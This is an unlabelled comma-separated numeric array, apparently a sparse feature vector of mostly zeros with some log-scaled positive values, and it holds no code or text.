0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 20.561728078908178, 0.0, 4.825453896395787, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.68697535633982, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 17.680622364027936, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.825453896395788, 2.302585092994046, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.631631038266565, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.5553480614894135, 0, 0.0, 0.0, 0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.736198448394496, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.4657359027997265, 0.0, 0.0, 0.0, 0.0, 0.0, 8.266085260861173, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 4.890349128221754, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.4825185607408002, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.6888794541139363, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.060443010546419, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.4965075614664802, 0.0, 0.0, 7.965635675306504, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0, 0, 0.0, 0, 4.634728988229636, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 5.101797476893978, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 4.0943445622221, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 6.578517662373903, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4011973816621555, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 3.7369991058576035, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.769774563315189, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 12.912195279612511, 0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.942799375126702, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 